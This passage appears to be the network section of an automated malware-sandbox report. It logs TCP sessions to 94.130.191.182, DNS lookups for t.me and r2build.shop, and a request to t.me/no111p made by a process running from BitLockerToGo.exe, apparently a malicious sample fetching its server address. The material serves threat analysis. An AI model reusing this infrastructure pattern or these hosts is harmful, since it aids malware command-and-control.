                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.262814999 CET4434979794.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.262830973 CET49797443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.262841940 CET4434979794.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.262851954 CET49797443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.262862921 CET49797443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.262864113 CET4434979794.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.262888908 CET4434979794.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.262913942 CET49797443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.262923956 CET49797443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.262934923 CET4434979794.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.262952089 CET49797443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.262959003 CET4434979794.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.262969971 CET49797443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.263031006 CET49797443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.263046980 CET49797443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.263089895 CET49797443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.263124943 CET49797443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.263201952 CET49797443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.263231993 CET49797443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.263247967 CET49797443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.264769077 CET49804443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.264821053 CET4434980494.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.264888048 CET49804443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.265100956 CET49804443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.265115976 CET4434980494.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.273274899 CET4434979794.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.273358107 CET4434979794.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.273391962 CET49797443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.273451090 CET4434979794.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.273454905 CET49797443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.273464918 CET49797443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.273478031 CET49797443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.273490906 CET4434979794.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.273540974 CET49797443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.273555040 CET4434979794.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.273571968 CET49797443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.273592949 CET4434979794.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.273633957 CET49797443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.273647070 CET4434979794.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.273653984 CET49797443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.273663044 CET4434979794.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.273679972 CET49797443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.273705006 CET4434979794.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.273782969 CET49797443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.273797035 CET4434979794.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.273813963 CET49797443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.273823023 CET4434979794.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.273860931 CET49797443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.273874998 CET4434979794.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.273893118 CET49797443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.273900986 CET4434979794.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.273955107 CET49797443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.273977041 CET4434979794.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.273993015 CET49797443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.274003029 CET4434979794.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.274018049 CET49797443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.274034977 CET4434979794.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.274077892 CET49797443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.274091959 CET4434979794.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.274099112 CET49797443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.274107933 CET4434979794.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.274118900 CET49797443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.274127007 CET49797443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.274142981 CET49797443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.274158955 CET4434979794.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.274192095 CET49797443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.274205923 CET4434979794.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.274224997 CET49797443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.274235964 CET4434979794.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.274241924 CET49797443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.274251938 CET4434979794.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.274254084 CET49797443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.274300098 CET4434979794.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.274313927 CET49797443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.274327040 CET4434979794.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.274333954 CET49797443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.274354935 CET49797443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.274360895 CET4434979794.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.274379969 CET4434979794.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.274401903 CET49797443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.274424076 CET4434979794.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.274456024 CET49797443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.274468899 CET4434979794.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.274485111 CET49797443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.274497032 CET4434979794.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.274537086 CET49797443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.274561882 CET4434979794.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.274574041 CET49797443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.274581909 CET4434979794.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.274596930 CET49797443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.274609089 CET49797443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.274641991 CET4434979794.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.274677038 CET49797443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.274692059 CET49797443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.274705887 CET49797443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.274724960 CET4434979794.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.274777889 CET49797443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.274785995 CET4434979794.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.274869919 CET49797443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.274893999 CET49797443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.274913073 CET49797443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.305633068 CET4434979794.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.305716991 CET4434979794.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.305910110 CET4434979794.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.306344032 CET4434979794.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.928272009 CET4434980494.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.929594994 CET49804443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.930054903 CET49804443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.930072069 CET4434980494.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.931787968 CET49804443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:00.931802034 CET4434980494.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:01.669308901 CET4434980494.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:01.669328928 CET4434980494.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:01.669383049 CET4434980494.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:01.669480085 CET49804443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:01.669481039 CET49804443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:01.669481039 CET49804443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:01.669789076 CET49804443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:01.669795990 CET4434980494.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:01.672446012 CET49815443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:01.672468901 CET4434981594.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:01.672537088 CET49815443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:01.672739029 CET49815443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:01.672750950 CET4434981594.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:02.338690042 CET4434981594.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:02.338764906 CET49815443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:02.339114904 CET49815443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:02.339128017 CET4434981594.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:02.340668917 CET49815443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:02.340676069 CET4434981594.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:03.025574923 CET4434981594.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:03.025592089 CET4434981594.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:03.025630951 CET49815443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:03.025650978 CET4434981594.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:03.025657892 CET49815443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:03.025686979 CET49815443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:03.026344061 CET49815443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:03.026365995 CET4434981594.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:03.174247026 CET49825443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:03.174345970 CET4434982594.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:03.174429893 CET49825443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:03.175421000 CET49825443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:03.175460100 CET4434982594.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:03.823209047 CET4434982594.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:03.823271990 CET49825443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:03.823647022 CET49825443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:03.823658943 CET4434982594.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:03.825329065 CET49825443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:03.825342894 CET4434982594.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:04.464636087 CET4434982594.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:04.464701891 CET4434982594.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:04.464854002 CET49825443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:04.465763092 CET49825443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:04.465785027 CET4434982594.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:06.850065947 CET4434979794.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:06.850127935 CET49797443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:06.850153923 CET4434979794.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:06.850205898 CET49797443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:06.850213051 CET4434979794.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:06.850233078 CET4434979794.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:06.850253105 CET49797443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:06.850276947 CET49797443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:06.851038933 CET49797443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:06.851047993 CET4434979794.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:07.206129074 CET49850443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:07.206182957 CET4434985094.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:07.206321001 CET49850443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:07.206522942 CET49850443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:07.206547022 CET4434985094.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:07.877592087 CET4434985094.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:07.877677917 CET49850443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:07.878220081 CET49850443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:07.878235102 CET4434985094.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:07.879925013 CET49850443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:07.879934072 CET4434985094.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:08.568367004 CET4434985094.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:08.568428993 CET4434985094.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:08.568447113 CET49850443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:08.568497896 CET49850443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:08.568691015 CET49850443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:08.568727970 CET4434985094.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:08.570215940 CET49856443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:08.570241928 CET4434985694.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:08.570328951 CET49856443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:08.570615053 CET49856443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:08.570625067 CET4434985694.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:09.224282026 CET4434985694.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:09.224375963 CET49856443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:09.224838018 CET49856443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:09.224848986 CET4434985694.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:09.226562023 CET49856443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:09.226568937 CET4434985694.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:09.899256945 CET4434985694.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:09.899323940 CET49856443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:09.899334908 CET4434985694.130.191.182192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:09.899430037 CET49856443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:09.899642944 CET49856443192.168.2.494.130.191.182
                                                                                                                                                                                                                                    Jan 9, 2025 14:02:09.899653912 CET4434985694.130.191.182192.168.2.4

                                                                                                                                                                                                                                    UDP Packets

                                                                                                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                    Jan 9, 2025 14:01:19.569142103 CET138138192.168.2.4192.168.2.255
                                                                                                                                                                                                                                    Jan 9, 2025 14:01:29.274722099 CET5512753192.168.2.41.1.1.1
                                                                                                                                                                                                                                    Jan 9, 2025 14:01:29.281675100 CET53551271.1.1.1192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:01:30.274990082 CET6053653192.168.2.41.1.1.1
                                                                                                                                                                                                                                    Jan 9, 2025 14:01:30.289175034 CET53605361.1.1.1192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:01:40.748464108 CET53612521.1.1.1192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:01:40.799876928 CET53561501.1.1.1192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:01:40.923284054 CET5830253192.168.2.41.1.1.1
                                                                                                                                                                                                                                    Jan 9, 2025 14:01:40.923558950 CET4992453192.168.2.41.1.1.1
                                                                                                                                                                                                                                    Jan 9, 2025 14:01:40.929907084 CET53583021.1.1.1192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:01:40.930394888 CET53499241.1.1.1192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:01:41.776834965 CET53578551.1.1.1192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:01:42.674408913 CET53585151.1.1.1192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:01:44.874958038 CET5148053192.168.2.41.1.1.1
                                                                                                                                                                                                                                    Jan 9, 2025 14:01:44.875298977 CET5509753192.168.2.41.1.1.1
                                                                                                                                                                                                                                    Jan 9, 2025 14:01:44.878001928 CET53588921.1.1.1192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:01:44.881709099 CET53514801.1.1.1192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:01:44.882476091 CET53550971.1.1.1192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:01:45.864537954 CET5507453192.168.2.41.1.1.1
                                                                                                                                                                                                                                    Jan 9, 2025 14:01:45.864690065 CET5870553192.168.2.41.1.1.1
                                                                                                                                                                                                                                    Jan 9, 2025 14:01:45.871357918 CET53550741.1.1.1192.168.2.4
                                                                                                                                                                                                                                    Jan 9, 2025 14:01:45.871387005 CET53587051.1.1.1192.168.2.4

                                                                                                                                                                                                                                    DNS Queries

                                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                    Jan 9, 2025 14:01:29.274722099 CET192.168.2.41.1.1.10xded3Standard query (0)t.meA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Jan 9, 2025 14:01:30.274990082 CET192.168.2.41.1.1.10xa59bStandard query (0)r2build.shopA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Jan 9, 2025 14:01:40.923284054 CET192.168.2.41.1.1.10xc926Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Jan 9, 2025 14:01:40.923558950 CET192.168.2.41.1.1.10xc20eStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                    Jan 9, 2025 14:01:44.874958038 CET192.168.2.41.1.1.10x96cbStandard query (0)apis.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Jan 9, 2025 14:01:44.875298977 CET192.168.2.41.1.1.10xc849Standard query (0)apis.google.com65IN (0x0001)false
                                                                                                                                                                                                                                    Jan 9, 2025 14:01:45.864537954 CET192.168.2.41.1.1.10x29d5Standard query (0)play.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Jan 9, 2025 14:01:45.864690065 CET192.168.2.41.1.1.10x2511Standard query (0)play.google.com65IN (0x0001)false

                                                                                                                                                                                                                                    DNS Answers

                                                                                                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                    Jan 9, 2025 14:01:29.281675100 CET1.1.1.1192.168.2.40xded3No error (0)t.me149.154.167.99A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Jan 9, 2025 14:01:30.289175034 CET1.1.1.1192.168.2.40xa59bNo error (0)r2build.shop94.130.191.182A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Jan 9, 2025 14:01:40.929907084 CET1.1.1.1192.168.2.40xc926No error (0)www.google.com142.250.185.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Jan 9, 2025 14:01:40.930394888 CET1.1.1.1192.168.2.40xc20eNo error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                    Jan 9, 2025 14:01:44.881709099 CET1.1.1.1192.168.2.40x96cbNo error (0)apis.google.complus.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                    Jan 9, 2025 14:01:44.881709099 CET1.1.1.1192.168.2.40x96cbNo error (0)plus.l.google.com142.250.186.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                    Jan 9, 2025 14:01:44.882476091 CET1.1.1.1192.168.2.40xc849No error (0)apis.google.complus.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                    Jan 9, 2025 14:01:45.871357918 CET1.1.1.1192.168.2.40x29d5No error (0)play.google.com142.250.186.46A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                                                                                                                    • t.me
                                                                                                                                                                                                                                    • r2build.shop
                                                                                                                                                                                                                                    • www.google.com
                                                                                                                                                                                                                                    • apis.google.com
                                                                                                                                                                                                                                    • play.google.com

                                                                                                                                                                                                                                    HTTPS Proxied Packets

                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    0192.168.2.449736149.154.167.994433428C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    2025-01-09 13:01:30 UTC85OUTGET /no111p HTTP/1.1
                                                                                                                                                                                                                                    Host: t.me
                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    2025-01-09 13:01:30 UTC512INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx/1.18.0
                                                                                                                                                                                                                                    Date: Thu, 09 Jan 2025 13:01:30 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                    Content-Length: 12303
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Set-Cookie: stel_ssid=6af80e8459efe974f1_17857208021621876688; expires=Fri, 10 Jan 2025 13:01:30 GMT; path=/; samesite=None; secure; HttpOnly
                                                                                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                                                                                    Cache-control: no-store
                                                                                                                                                                                                                                    X-Frame-Options: ALLOW-FROM https://web.telegram.org
                                                                                                                                                                                                                                    Content-Security-Policy: frame-ancestors https://web.telegram.org
                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=35768000
